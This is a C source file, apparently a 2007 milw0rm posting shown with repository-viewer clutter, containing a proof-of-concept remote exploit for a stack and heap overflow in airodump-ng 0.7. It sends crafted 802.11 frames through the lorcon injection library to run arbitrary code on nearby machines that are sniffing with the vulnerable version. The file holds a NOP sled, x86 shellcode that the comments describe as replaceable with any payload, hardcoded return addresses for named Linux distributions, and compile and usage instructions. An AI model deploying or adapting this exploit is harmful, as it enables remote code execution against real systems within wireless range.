186 lines
4.9 KiB
C
Executable file
186 lines
4.9 KiB
C
Executable file
/**
|
|
* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit
|
|
*
|
|
* Proof of concept exploit for a stack (and heap) based
|
|
* overflow in airodump-ng. The vulnerability can be exploited
|
|
* by transmitting some specially crafted 802.11 packets to
|
|
* execute arbitrary code on any machines within range
|
|
* that are sniffing with a vulnerable version of airodump-ng.
|
|
*
|
|
* This exploit requires the lorcon 802.11 packet injection
|
|
* library, see http://802.11ninja.net for details.
|
|
*
|
|
* Compiling:
|
|
*
|
|
* gcc -o airodump-remote airodump-remote.c -lorcon
|
|
*
|
|
* Usage:
|
|
*
|
|
* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]
|
|
*
|
|
* Drivers supported by lorcon:
|
|
*
|
|
* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,
|
|
* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw
|
|
*
|
|
* Header types:
|
|
*
|
|
* 0 - None (not tested)
|
|
* 1 - Fake prism54 header
|
|
* 2 - Fake radiotap header (not tested)
|
|
*
|
|
* Return addresses:
|
|
*
|
|
* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934
|
|
* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934
|
|
*
|
|
* Example usage:
|
|
*
|
|
* ./airodump-ng wlan0 prism54 11 1 0x8054934
|
|
*
|
|
* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt
|
|
* Author: Jonathan So [ jonny [ @ ] nop-art.net ]
|
|
*
|
|
* Copyright (C) 2007 Jonathan So
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <tx80211.h>
|
|
|
|
// Linux x86 sys_write shellcode. Any arbitrary shellcode should work
|
|
// here, it doesn't matter if it contains nulls. Maximum 792 bytes.
|
|
|
|
char shellcode[] = "\xeb\x14" // jmp get_message
|
|
|
|
// start:
|
|
"\x59\x31\xdb\x31\xd2\xb2"
|
|
"\x1b" // message length
|
|
"\x31\xc0\x88\x04\x11"
|
|
"\xb0\x04\xcd\x80" // sys_write
|
|
"\xb0\x01\xcd\x80" // sys_exit
|
|
|
|
// get_message:
|
|
"\xe8\xe7\xff\xff\xff" // call start
|
|
"Stop sniffing our network!!"; // message text
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
tx80211_t tx;
|
|
tx80211_packet_t txp;
|
|
uint8_t packet[1044];
|
|
uint8_t *ppacket;
|
|
|
|
int headertype;
|
|
unsigned ret_addr = 0x8054934;
|
|
FILE *fp;
|
|
|
|
if(argc<5) {
|
|
printf("usage: %s <interface> <driver> <channel> <arptype>
|
|
[ret_addr]\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
if(argc>5) {
|
|
ret_addr = strtoul(argv[5], NULL, 16);
|
|
}
|
|
|
|
headertype = atoi(argv[4]);
|
|
|
|
if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=
|
|
TX80211_ENOERR) {
|
|
fprintf(stderr, "Error initializing driver");
|
|
return 1;
|
|
}
|
|
|
|
if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=
|
|
TX80211_ENOERR) {
|
|
fprintf(stderr, "Error setting inject mode\n");
|
|
return 1;
|
|
}
|
|
|
|
if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {
|
|
fprintf(stderr, "Error setting channel\n");
|
|
}
|
|
|
|
if (tx80211_open(&tx) < 0) {
|
|
fprintf(stderr, "Unable to open interface\n");
|
|
return 1;
|
|
}
|
|
|
|
txp.packet = packet;
|
|
|
|
// Fill packet with nops
|
|
memset(packet, 0x90, sizeof(packet));
|
|
|
|
switch (headertype) {
|
|
case 0:
|
|
// No arptype, just send raw packet
|
|
ppacket = packet;
|
|
break;
|
|
case 1:
|
|
// Send fake prism header
|
|
memcpy(packet+4, "\x08\x00\x00\x00", 4);
|
|
ppacket = packet + 8;
|
|
break;
|
|
case 2:
|
|
// Send fake radiotap header
|
|
packet[0] = 0;
|
|
packet[2] = 3;
|
|
ppacket = packet + 3;
|
|
break;
|
|
default:
|
|
printf("Invalid header type. Valid options are:\n");
|
|
printf(" 0 - none\n");
|
|
printf(" 1 - prism54\n");
|
|
printf(" 2 - radiotap\n");
|
|
return 1;
|
|
}
|
|
|
|
// set some necessary 802.11 header fields
|
|
ppacket[0] = 0xB0;
|
|
ppacket[1] = 0;
|
|
ppacket[24] = 1;
|
|
ppacket[25] = 0;
|
|
ppacket[26] = 2;
|
|
ppacket[27] = 0;
|
|
|
|
txp.plen = 512 + (ppacket - packet);
|
|
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
|
|
fprintf(stderr, "Error sending packet 1\n");
|
|
return 1;
|
|
}
|
|
|
|
ppacket[26] = 4;
|
|
|
|
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
|
|
fprintf(stderr, "Error sending packet 2\n");
|
|
return 1;
|
|
}
|
|
|
|
// Insert shellcode at end of nopsled
|
|
memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));
|
|
|
|
// Overwrite some char*, needs to be a valid address
|
|
memcpy(ppacket+1028, &ret_addr, 4);
|
|
|
|
// Overwrite global variable sk_len, used as argument to memcpy
|
|
memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);
|
|
|
|
// Return address
|
|
memcpy(ppacket+820, &ret_addr, 4);
|
|
|
|
ppacket[1] = 0x40;
|
|
txp.plen = 1036 + + (ppacket - packet);
|
|
|
|
if (tx80211_txpacket(&tx, &txp) < txp.plen) {
|
|
fprintf(stderr, "Error sending packet 3\n");
|
|
return 1;
|
|
}
|
|
|
|
tx80211_close(&tx);
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-04-12]
|